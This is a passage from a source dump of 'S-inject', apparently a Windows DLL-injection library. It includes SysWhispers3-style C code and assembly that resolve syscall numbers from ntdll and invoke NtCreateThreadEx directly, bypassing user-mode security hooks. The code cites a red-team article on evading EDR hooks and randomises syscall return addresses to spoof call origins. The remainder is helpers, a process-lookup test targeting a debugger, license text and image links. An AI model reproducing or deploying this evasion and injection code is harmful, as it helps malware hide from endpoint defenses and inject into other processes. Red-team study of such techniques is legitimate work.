19 | 	syscall                    ; Invoke system call.
20 | 	ret
21 | Sw3NtCreateThreadEx ENDP
22 | 
23 | end


--------------------------------------------------------------------------------
/InjectLib/app/S-Wisper.c:
--------------------------------------------------------------------------------
  1 | #include "S-Wisper.h"
  2 | #include <stdio.h>
  3 | 
  4 | //#define DEBUG
  5 | 
  6 | // JUMPER
  7 | 
  8 | #ifdef _M_IX86
  9 | 
 10 | EXTERN_C PVOID internal_cleancall_wow64_gate(VOID) {
 11 |     return (PVOID)__readfsdword(0xC0);
 12 | }
 13 | 
 14 | __declspec(naked) BOOL local_is_wow64(void)
 15 | {
 16 |     __asm {
 17 |         mov eax, fs:[0xc0]
 18 |         test eax, eax
 19 |         jne wow64
 20 |         mov eax, 0
 21 |         ret
 22 |         wow64:
 23 |         mov eax, 1
 24 |         ret
 25 |     }
 26 | }
 27 | 
 28 | 
 29 | #endif
 30 | 
 31 | // Code below is adapted from @modexpblog. Read linked article for more details.
 32 | // https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams
 33 | 
 34 | SW3_SYSCALL_LIST SW3_SyscallList;
 35 | 
 36 | // SEARCH_AND_REPLACE
 37 | #ifdef SEARCH_AND_REPLACE
 38 | // THIS IS NOT DEFINED HERE; don't know if I'll add it in a future release
 39 | EXTERN void SearchAndReplace(unsigned char[], unsigned char[]);
 40 | #endif
 41 | 
 42 | DWORD SW3_HashSyscall(PCSTR FunctionName)
 43 | {
 44 |     DWORD i = 0;
 45 |     DWORD Hash = SW3_SEED;
 46 | 
 47 |     while (FunctionName[i])
 48 |     {
 49 |         WORD PartialName = *(WORD*)((ULONG_PTR)FunctionName + i++);
 50 |         Hash ^= PartialName + SW3_ROR8(Hash);
 51 |     }
 52 | 
 53 |     return Hash;
 54 | }
 55 | 
 56 | #ifndef JUMPER
 57 | PVOID SC_Address(PVOID NtApiAddress)
 58 | {
 59 |     return NULL;
 60 | }
 61 | #else
 62 | PVOID SC_Address(PVOID NtApiAddress)
 63 | {
 64 |     DWORD searchLimit = 512;
 65 |     PVOID SyscallAddress;
 66 | 
 67 |    #ifdef _WIN64
 68 |     // If the process is 64-bit on a 64-bit OS, we need to search for syscall
 69 |     BYTE syscall_code[] = { 0x0f, 0x05, 0xc3 };
 70 |     ULONG distance_to_syscall = 0x12;
 71 |    #else
 72 |     // If the process is 32-bit on a 32-bit OS, we need to search for sysenter
 73 |     BYTE syscall_code[] = { 0x0f, 0x34, 0xc3 };
 74 |     ULONG distance_to_syscall = 0x0f;
 75 |    #endif
 76 | 
 77 |   #ifdef _M_IX86
 78 |     // If the process is 32-bit on a 64-bit OS, we need to jump to WOW32Reserved
 79 |     if (local_is_wow64())
 80 |     {
 81 |     #ifdef DEBUG
 82 |         printf("[+] Running 32-bit app on x64 (WOW64)\n");
 83 |     #endif
 84 |         return NULL;
 85 |     }
 86 |   #endif
 87 | 
 88 |     // we don't really care if there is a 'jmp' between
 89 |     // NtApiAddress and the 'syscall; ret' instructions
 90 |     SyscallAddress = SW3_RVA2VA(PVOID, NtApiAddress, distance_to_syscall);
 91 | 
 92 |     if (!memcmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))
 93 |     {
 94 |         // we can use the original code for this system call :)
 95 |         #if defined(DEBUG)
 96 |             printf("Found Syscall Opcodes at address 0x%p\n", SyscallAddress);
 97 |         #endif
 98 |         return SyscallAddress;
 99 |     }
100 | 
101 |     // the 'syscall; ret' intructions have not been found,
102 |     // we will try to use one near it, similarly to HalosGate
103 | 
104 |     for (ULONG32 num_jumps = 1; num_jumps < searchLimit; num_jumps++)
105 |     {
106 |         // let's try with an Nt* API below our syscall
107 |         SyscallAddress = SW3_RVA2VA(
108 |             PVOID,
109 |             NtApiAddress,
110 |             distance_to_syscall + num_jumps * 0x20);
111 |         if (!memcmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))
112 |         {
113 |         #if defined(DEBUG)
114 |             printf("Found Syscall Opcodes at address 0x%p\n", SyscallAddress);
115 |         #endif
116 |             return SyscallAddress;
117 |         }
118 | 
119 |         // let's try with an Nt* API above our syscall
120 |         SyscallAddress = SW3_RVA2VA(
121 |             PVOID,
122 |             NtApiAddress,
123 |             distance_to_syscall - num_jumps * 0x20);
124 |         if (!memcmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))
125 |         {
126 |         #if defined(DEBUG)
127 |             printf("Found Syscall Opcodes at address 0x%p\n", SyscallAddress);
128 |         #endif
129 |             return SyscallAddress;
130 |         }
131 |     }
132 | 
133 | #ifdef DEBUG
134 |     printf("Syscall Opcodes not found!\n");
135 | #endif
136 | 
137 |     return NULL;
138 | }
139 | #endif
140 | 
141 | 
142 | BOOL SW3_PopulateSyscallList()
143 | {
144 |     // Return early if the list is already populated.
145 |     if (SW3_SyscallList.Count) return TRUE;
146 | 
147 |     #ifdef _WIN64
148 |     PSW3_PEB Peb = (PSW3_PEB)__readgsqword(0x60);
149 |     #else
150 |     PSW3_PEB Peb = (PSW3_PEB)__readfsdword(0x30);
151 |     #endif
152 |     PSW3_PEB_LDR_DATA Ldr = Peb->Ldr;
153 |     PIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;
154 |     PVOID DllBase = NULL;
155 | 
156 |     // Get the DllBase address of NTDLL.dll. NTDLL is not guaranteed to be the second
157 |     // in the list, so it's safer to loop through the full list and find it.
158 |     PSW3_LDR_DATA_TABLE_ENTRY LdrEntry;
159 |     for (LdrEntry = (PSW3_LDR_DATA_TABLE_ENTRY)Ldr->Reserved2[1]; LdrEntry->DllBase != NULL; LdrEntry = (PSW3_LDR_DATA_TABLE_ENTRY)LdrEntry->Reserved1[0])
160 |     {
161 |         DllBase = LdrEntry->DllBase;
162 |         PIMAGE_DOS_HEADER DosHeader = (PIMAGE_DOS_HEADER)DllBase;
163 |         PIMAGE_NT_HEADERS NtHeaders = SW3_RVA2VA(PIMAGE_NT_HEADERS, DllBase, DosHeader->e_lfanew);
164 |         PIMAGE_DATA_DIRECTORY DataDirectory = (PIMAGE_DATA_DIRECTORY)NtHeaders->OptionalHeader.DataDirectory;
165 |         DWORD VirtualAddress = DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
166 |         if (VirtualAddress == 0) continue;
167 | 
168 |         ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)SW3_RVA2VA(ULONG_PTR, DllBase, VirtualAddress);
169 | 
170 |         // If this is NTDLL.dll, exit loop.
171 |         PCHAR DllName = SW3_RVA2VA(PCHAR, DllBase, ExportDirectory->Name);
172 | 
173 |         if ((*(ULONG*)DllName | 0x20202020) != 0x6c64746e) continue;
174 |         if ((*(ULONG*)(DllName + 4) | 0x20202020) == 0x6c642e6c) break;
175 |     }
176 | 
177 |     if (!ExportDirectory) return FALSE;
178 | 
179 |     DWORD NumberOfNames = ExportDirectory->NumberOfNames;
180 |     PDWORD Functions = SW3_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfFunctions);
181 |     PDWORD Names = SW3_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfNames);
182 |     PWORD Ordinals = SW3_RVA2VA(PWORD, DllBase, ExportDirectory->AddressOfNameOrdinals);
183 | 
184 |     // Populate SW3_SyscallList with unsorted Zw* entries.
185 |     DWORD i = 0;
186 |     PSW3_SYSCALL_ENTRY Entries = SW3_SyscallList.Entries;
187 |     do
188 |     {
189 |         PCHAR FunctionName = SW3_RVA2VA(PCHAR, DllBase, Names[NumberOfNames - 1]);
190 | 
191 |         // Is this a system call?
192 |         if (*(USHORT*)FunctionName == 0x775a)
193 |         {
194 |             Entries[i].Hash = SW3_HashSyscall(FunctionName);
195 |             Entries[i].Address = Functions[Ordinals[NumberOfNames - 1]];
196 |             Entries[i].SyscallAddress = SC_Address(SW3_RVA2VA(PVOID, DllBase, Entries[i].Address));
197 | 
198 |             i++;
199 |             if (i == SW3_MAX_ENTRIES) break;
200 |         }
201 |     } while (--NumberOfNames);
202 | 
203 |     // Save total number of system calls found.
204 |     SW3_SyscallList.Count = i;
205 | 
206 |     // Sort the list by address in ascending order.
207 |     for (DWORD i = 0; i < SW3_SyscallList.Count - 1; i++)
208 |     {
209 |         for (DWORD j = 0; j < SW3_SyscallList.Count - i - 1; j++)
210 |         {
211 |             if (Entries[j].Address > Entries[j + 1].Address)
212 |             {
213 |                 // Swap entries.
214 |                 SW3_SYSCALL_ENTRY TempEntry;
215 | 
216 |                 TempEntry.Hash = Entries[j].Hash;
217 |                 TempEntry.Address = Entries[j].Address;
218 |                 TempEntry.SyscallAddress = Entries[j].SyscallAddress;
219 | 
220 |                 Entries[j].Hash = Entries[j + 1].Hash;
221 |                 Entries[j].Address = Entries[j + 1].Address;
222 |                 Entries[j].SyscallAddress = Entries[j + 1].SyscallAddress;
223 | 
224 |                 Entries[j + 1].Hash = TempEntry.Hash;
225 |                 Entries[j + 1].Address = TempEntry.Address;
226 |                 Entries[j + 1].SyscallAddress = TempEntry.SyscallAddress;
227 |             }
228 |         }
229 |     }
230 | 
231 |     return TRUE;
232 | }
233 | 
234 | EXTERN_C DWORD SW3_GetSyscallNumber(DWORD FunctionHash)
235 | {
236 |     // Ensure SW3_SyscallList is populated.
237 |     if (!SW3_PopulateSyscallList()) return -1;
238 | 
239 |     for (DWORD i = 0; i < SW3_SyscallList.Count; i++)
240 |     {
241 |         if (FunctionHash == SW3_SyscallList.Entries[i].Hash)
242 |         {
243 |             return i;
244 |         }
245 |     }
246 | 
247 |     return -1;
248 | }
249 | 
250 | EXTERN_C PVOID SW3_GetSyscallAddress(DWORD FunctionHash)
251 | {
252 |     // Ensure SW3_SyscallList is populated.
253 |     if (!SW3_PopulateSyscallList()) return NULL;
254 | 
255 |     for (DWORD i = 0; i < SW3_SyscallList.Count; i++)
256 |     {
257 |         if (FunctionHash == SW3_SyscallList.Entries[i].Hash)
258 |         {
259 |             return SW3_SyscallList.Entries[i].SyscallAddress;
260 |         }
261 |     }
262 | 
263 |     return NULL;
264 | }
265 | 
266 | EXTERN_C PVOID SW3_GetRandomSyscallAddress(DWORD FunctionHash)
267 | {
268 |     // Ensure SW3_SyscallList is populated.
269 |     if (!SW3_PopulateSyscallList()) return NULL;
270 | 
271 |     DWORD index = ((DWORD) rand()) % SW3_SyscallList.Count;
272 | 
273 |     while (FunctionHash == SW3_SyscallList.Entries[index].Hash){
274 |         // Spoofing the syscall return address
275 |         index = ((DWORD) rand()) % SW3_SyscallList.Count;
276 |     }
277 |     return SW3_SyscallList.Entries[index].SyscallAddress;
278 | }
279 | 


--------------------------------------------------------------------------------
/InjectLib/app/S-Wisper.h:
--------------------------------------------------------------------------------
  1 | #pragma once
  2 | // Code below is adapted from @modexpblog. Read linked article for more details.
  3 | // https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams
  4 | 
  5 | #ifndef SW3_HEADER_H_
  6 | #define SW3_HEADER_H_
  7 | 
  8 | #include <windows.h>
  9 | #include <winternl.h>
 10 | 
 11 | #ifndef _NTDEF_
 12 | typedef _Return_type_success_(return >= 0) LONG NTSTATUS;
 13 | typedef NTSTATUS* PNTSTATUS;
 14 | #endif
 15 | 
 16 | #define SW3_SEED 0xEB0CA24D
 17 | #define SW3_ROL8(v) (v << 8 | v >> 24)
 18 | #define SW3_ROR8(v) (v >> 8 | v << 24)
 19 | #define SW3_ROX8(v) ((SW3_SEED % 2) ? SW3_ROL8(v) : SW3_ROR8(v))
 20 | #define SW3_MAX_ENTRIES 600
 21 | #define SW3_RVA2VA(Type, DllBase, Rva) (Type)((ULONG_PTR) DllBase + Rva)
 22 | 
 23 | // Typedefs are prefixed to avoid pollution.
 24 | 
 25 | typedef struct _SW3_SYSCALL_ENTRY
 26 | {
 27 |     DWORD Hash;
 28 |     DWORD Address;
 29 | 	PVOID SyscallAddress;
 30 | } SW3_SYSCALL_ENTRY, *PSW3_SYSCALL_ENTRY;
 31 | 
 32 | typedef struct _SW3_SYSCALL_LIST
 33 | {
 34 |     DWORD Count;
 35 |     SW3_SYSCALL_ENTRY Entries[SW3_MAX_ENTRIES];
 36 | } SW3_SYSCALL_LIST, *PSW3_SYSCALL_LIST;
 37 | 
 38 | typedef struct _SW3_PEB_LDR_DATA {
 39 | 	BYTE Reserved1[8];
 40 | 	PVOID Reserved2[3];
 41 | 	LIST_ENTRY InMemoryOrderModuleList;
 42 | } SW3_PEB_LDR_DATA, *PSW3_PEB_LDR_DATA;
 43 | 
 44 | typedef struct _SW3_LDR_DATA_TABLE_ENTRY {
 45 | 	PVOID Reserved1[2];
 46 | 	LIST_ENTRY InMemoryOrderLinks;
 47 | 	PVOID Reserved2[2];
 48 | 	PVOID DllBase;
 49 | } SW3_LDR_DATA_TABLE_ENTRY, *PSW3_LDR_DATA_TABLE_ENTRY;
 50 | 
 51 | typedef struct _SW3_PEB {
 52 | 	BYTE Reserved1[2];
 53 | 	BYTE BeingDebugged;
 54 | 	BYTE Reserved2[1];
 55 | 	PVOID Reserved3[2];
 56 | 	PSW3_PEB_LDR_DATA Ldr;
 57 | } SW3_PEB, *PSW3_PEB;
 58 | 
 59 | DWORD SW3_HashSyscall(PCSTR FunctionName);
 60 | BOOL SW3_PopulateSyscallList();
 61 | EXTERN_C DWORD SW3_GetSyscallNumber(DWORD FunctionHash);
 62 | EXTERN_C PVOID SW3_GetSyscallAddress(DWORD FunctionHash);
 63 | EXTERN_C PVOID internal_cleancall_wow64_gate(VOID);
 64 | typedef struct _PS_ATTRIBUTE
 65 | {
 66 | 	ULONG  Attribute;
 67 | 	SIZE_T Size;
 68 | 	union
 69 | 	{
 70 | 		ULONG Value;
 71 | 		PVOID ValuePtr;
 72 | 	} u1;
 73 | 	PSIZE_T ReturnLength;
 74 | } PS_ATTRIBUTE, *PPS_ATTRIBUTE;
 75 | 
 76 | #ifndef InitializeObjectAttributes
 77 | #define InitializeObjectAttributes( p, n, a, r, s ) { \
 78 | 	(p)->Length = sizeof( OBJECT_ATTRIBUTES );        \
 79 | 	(p)->RootDirectory = r;                           \
 80 | 	(p)->Attributes = a;                              \
 81 | 	(p)->ObjectName = n;                              \
 82 | 	(p)->SecurityDescriptor = s;                      \
 83 | 	(p)->SecurityQualityOfService = NULL;             \
 84 | }
 85 | #endif
 86 | 
 87 | typedef struct _UNICODE_STRING_A
 88 | {
 89 | 	USHORT Length;
 90 | 	USHORT MaximumLength;
 91 | 	PWSTR  Buffer;
 92 | } UNICODE_STRINGA, *PUNICODE_STRINGA;
 93 | 
 94 | typedef struct _OBJECT_ATTRIBUTES_A
 95 | {
 96 | 	ULONG           Length;
 97 | 	HANDLE          RootDirectory;
 98 | 	UNICODE_STRINGA ObjectName;
 99 | 	ULONG           Attributes;
100 | 	PVOID           SecurityDescriptor;
101 | 	PVOID           SecurityQualityOfService;
102 | } OBJECT_ATTRIBUTESA, *POBJECT_ATTRIBUTESA;
103 | 
104 | typedef struct _PS_ATTRIBUTE_LIST
105 | {
106 | 	SIZE_T       TotalLength;
107 | 	PS_ATTRIBUTE Attributes[1];
108 | } PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;
109 | 
110 | EXTERN_C NTSTATUS Sw3NtCreateThreadEx(
111 | 	OUT PHANDLE ThreadHandle,
112 | 	IN ACCESS_MASK DesiredAccess,
113 | 	IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
114 | 	IN HANDLE ProcessHandle,
115 | 	IN PVOID StartRoutine,
116 | 	IN PVOID Argument OPTIONAL,
117 | 	IN ULONG CreateFlags,
118 | 	IN SIZE_T ZeroBits,
119 | 	IN SIZE_T StackSize,
120 | 	IN SIZE_T MaximumStackSize,
121 | 	IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL);
122 | 
123 | #endif
124 | 


--------------------------------------------------------------------------------
/InjectLib/app/utils/crypto.hpp:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | #include <iostream>
 4 | #include <Windows.h>
 5 | #include <vector>
 6 | #include <wincrypt.h>
 7 | 
 8 | 
 9 | namespace Crypto {
10 |     std::string Base64Decode(std::string EncodedStr) {
11 |         DWORD decodedSize = 0;
12 | 
13 |         if (!CryptStringToBinaryA(EncodedStr.c_str(), 0, CRYPT_STRING_BASE64, nullptr, &decodedSize, nullptr, nullptr)) {
14 |             return "";
15 |         }
16 | 
17 |         std::vector<BYTE> decodedData(decodedSize);
18 | 
19 |         if (!CryptStringToBinaryA(EncodedStr.c_str(), 0, CRYPT_STRING_BASE64, decodedData.data(), &decodedSize, nullptr, nullptr)) {
20 |             return "";
21 |         }
22 |         return std::string(decodedData.begin(), decodedData.end());
23 |     }
24 | 
25 |     std::string Base64Encode(const std::vector<BYTE>& data) {
26 |         DWORD encodedSize = 0;
27 |         if (!CryptBinaryToStringA(data.data(), data.size(), CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, NULL, &encodedSize)) {
28 |             return "";
29 |         }
30 | 
31 |         std::vector<char> encodedData(encodedSize);
32 |         if (!CryptBinaryToStringA(data.data(), data.size(), CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, encodedData.data(), &encodedSize)) {
33 |             return "";
34 |         }
35 | 
36 |         return std::string(encodedData.data(), encodedSize);
37 |     }
38 | }


--------------------------------------------------------------------------------
/InjectLib/app/utils/query.hpp:
--------------------------------------------------------------------------------
  1 | #pragma once
  2 | #include <Windows.h>
  3 | #include <winternl.h>
  4 | // NtQuerySystemInformation 
  5 | typedef enum _KWAIT_REASON {
  6 |     Executive,
  7 |     FreePage,
  8 |     PageIn,
  9 |     PoolAllocation,
 10 |     DelayExecution,
 11 |     Suspended,
 12 |     UserRequest,
 13 |     WrExecutive,
 14 |     WrFreePage,
 15 |     WrPageIn,
 16 |     WrPoolAllocation,
 17 |     WrDelayExecution,
 18 |     WrSuspended,
 19 |     WrUserRequest,
 20 |     WrEventPair,
 21 |     WrQueue,
 22 |     WrLpcReceive,
 23 |     WrLpcReply,
 24 |     WrVirtualMemory,
 25 |     WrPageOut,
 26 |     WrRendezvous,
 27 |     WrKeyedEvent,
 28 |     WrTerminated,
 29 |     WrProcessInSwap,
 30 |     WrCpuRateControl,
 31 |     WrCalloutStack,
 32 |     WrKernel,
 33 |     WrResource,
 34 |     WrPushLock,
 35 |     WrMutex,
 36 |     WrQuantumEnd,
 37 |     WrDispatchInt,
 38 |     WrPreempted,
 39 |     WrYieldExecution,
 40 |     WrFastMutex,
 41 |     WrGuardedMutex,
 42 |     WrRundown,
 43 |     WrAlertByThreadId,
 44 |     WrDeferredPreempt,
 45 |     MaximumWaitReason
 46 | } KWAIT_REASON;
 47 | 
 48 | typedef NTSTATUS(WINAPI* fnNtQuerySystemInformation)(
 49 |     SYSTEM_INFORMATION_CLASS SystemInformationClass,
 50 |     PVOID SystemInformation,
 51 |     ULONG SystemInformationLength,
 52 |     PULONG ReturnLength);
 53 | 
 54 | // ���� SYSTEM_PROCESS_INFORMATION �ṹ
 55 | typedef struct _SYSTEM_THREADS {
 56 |     LARGE_INTEGER   KernelTime;
 57 |     LARGE_INTEGER   UserTime;
 58 |     LARGE_INTEGER   CreateTime;
 59 |     ULONG           WaitTime;
 60 |     PVOID           StartAddress;
 61 |     CLIENT_ID       ClientId;
 62 |     KPRIORITY       Priority;
 63 |     LONG            BasePriority;
 64 |     ULONG           ContextSwitchCount;
 65 |     ULONG           State;
 66 |     KWAIT_REASON    WaitReason;
 67 | } SYSTEM_THREADS, * PSYSTEM_THREADS;
 68 | 
 69 | typedef struct _SYSTEM_PROC_INFORMATION {
 70 |     ULONG           NextEntryOffset;
 71 |     ULONG           NumberOfThreads;
 72 |     LARGE_INTEGER   Reserved[3];
 73 |     LARGE_INTEGER   CreateTime;
 74 |     LARGE_INTEGER   UserTime;
 75 |     LARGE_INTEGER   KernelTime;
 76 |     UNICODE_STRING  ImageName;
 77 |     KPRIORITY       BasePriority;
 78 |     HANDLE          ProcessId;
 79 |     HANDLE          InheritedFromProcessId;
 80 |     ULONG           HandleCount;
 81 |     ULONG           SessionId;
 82 |     ULONG_PTR       UniqueProcessKey;
 83 |     SIZE_T          PeakVirtualSize;
 84 |     SIZE_T          VirtualSize;
 85 |     ULONG           PageFaultCount;
 86 |     SIZE_T          PeakWorkingSetSize;
 87 |     SIZE_T          WorkingSetSize;
 88 |     SIZE_T          QuotaPeakPagedPoolUsage;
 89 |     SIZE_T          QuotaPagedPoolUsage;
 90 |     SIZE_T          QuotaPeakNonPagedPoolUsage;
 91 |     SIZE_T          QuotaNonPagedPoolUsage;
 92 |     SIZE_T          PagefileUsage;
 93 |     SIZE_T          PeakPagefileUsage;
 94 |     SIZE_T          PrivatePageCount;
 95 |     LARGE_INTEGER   ReadOperationCount;
 96 |     LARGE_INTEGER   WriteOperationCount;
 97 |     LARGE_INTEGER   OtherOperationCount;
 98 |     LARGE_INTEGER   ReadTransferCount;
 99 |     LARGE_INTEGER   WriteTransferCount;
100 |     LARGE_INTEGER   OtherTransferCount;
101 |     SYSTEM_THREADS  Threads[1];
102 | } MySYSTEM_PROCESS_INFORMATION, * PMySYSTEM_PROCESS_INFORMATION;


--------------------------------------------------------------------------------
/InjectLib/cpp.hint:
--------------------------------------------------------------------------------
1 | #define INJECTLIB_API __declspec(dllexport)
2 | #define INJECTLIB_API __declspec(dllimport)
3 | 


--------------------------------------------------------------------------------
/InjectLib/dllmain.cpp:
--------------------------------------------------------------------------------
 1 | // dllmain.cpp : 定义 DLL 应用程序的入口点。
 2 | #include "pch.h"
 3 | 
 4 | BOOL APIENTRY DllMain( HMODULE hModule,
 5 |                        DWORD  ul_reason_for_call,
 6 |                        LPVOID lpReserved
 7 |                      )
 8 | {
 9 |     switch (ul_reason_for_call)
10 |     {
11 |     case DLL_PROCESS_ATTACH:
12 |     case DLL_THREAD_ATTACH:
13 |     case DLL_THREAD_DETACH:
14 |     case DLL_PROCESS_DETACH:
15 |         break;
16 |     }
17 |     return TRUE;
18 | }
19 | 
20 | 


--------------------------------------------------------------------------------
/InjectLib/framework.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | 
3 | #define WIN32_LEAN_AND_MEAN             // 从 Windows 头文件中排除极少使用的内容
4 | // Windows 头文件
5 | #include <windows.h>
6 | 


--------------------------------------------------------------------------------
/InjectLib/pch.cpp:
--------------------------------------------------------------------------------
1 | // pch.cpp: 与预编译标头对应的源文件
2 | 
3 | #include "pch.h"
4 | 
5 | // 当使用预编译的头时，需要使用此源文件，编译才能成功。
6 | 


--------------------------------------------------------------------------------
/InjectLib/pch.h:
--------------------------------------------------------------------------------
1 | #ifndef PCH_H
2 | #define PCH_H
3 | 
4 | // 添加要在此处预编译的标头
5 | #include "framework.h"
6 | 
7 | #endif //PCH_H
8 | 


--------------------------------------------------------------------------------
/InjectLib/test/dll_test.py:
--------------------------------------------------------------------------------
 1 | import ctypes
 2 | 
 3 | # 加载 DLL（路径根据实际情况）
 4 | dll = ctypes.WinDLL("./InjectLib.dll")
 5 | 
 6 | # 声明函数：GetPIDByProcessName
 7 | dll.getPID.argtypes = [ctypes.c_char_p]     # 参数是 const char*
 8 | dll.getPID.restype = ctypes.c_uint32        # 返回 DWORD（uint32）
 9 | # 传入进程名，比如 notepad.exe
10 | process_name = b"x64dbg"  # 注意要是 bytes 类型
11 | pid = dll.getPID(process_name)
12 | 
13 | print(f"PID of {process_name.decode()}: {pid}")
14 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2024 Joe1sn
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.assets/image-20240205124826998.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20240205124826998.png


--------------------------------------------------------------------------------
/README.assets/image-20240205125036362.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20240205125036362.png


--------------------------------------------------------------------------------
/README.assets/image-20240205131316348.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20240205131316348.png


--------------------------------------------------------------------------------
/README.assets/image-20240205131438254.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20240205131438254.png


--------------------------------------------------------------------------------
/README.assets/image-20240205135210534.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20240205135210534.png


--------------------------------------------------------------------------------
/README.assets/image-20240205135709302.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20240205135709302.png


--------------------------------------------------------------------------------
/README.assets/image-20240205140305351.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20240205140305351.png


--------------------------------------------------------------------------------
/README.assets/image-20240205140815069.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20240205140815069.png


--------------------------------------------------------------------------------
/README.assets/image-20240205141410967.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20240205141410967.png


--------------------------------------------------------------------------------
/README.assets/image-20240216112653373.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20240216112653373.png


--------------------------------------------------------------------------------
/README.assets/image-20240216113029381.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20240216113029381.png


--------------------------------------------------------------------------------
/README.assets/image-20240216113432922.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20240216113432922.png


--------------------------------------------------------------------------------
/README.assets/image-20240216113917066.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20240216113917066.png


--------------------------------------------------------------------------------
/README.assets/image-20240401105145205.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20240401105145205.png


--------------------------------------------------------------------------------
/README.assets/image-20240401105329537.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20240401105329537.png


--------------------------------------------------------------------------------
/README.assets/image-20240520101531243.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20240520101531243.png


--------------------------------------------------------------------------------
/README.assets/image-20240520101608876.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20240520101608876.png


--------------------------------------------------------------------------------
/README.assets/image-20240520101704029.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20240520101704029.png


--------------------------------------------------------------------------------
/README.assets/image-20240606124658850.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20240606124658850.png


--------------------------------------------------------------------------------
/README.assets/image-20240606131806622.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20240606131806622.png


--------------------------------------------------------------------------------
/README.assets/image-20240606224950591.png:
--------------------------------------------------------------------------------
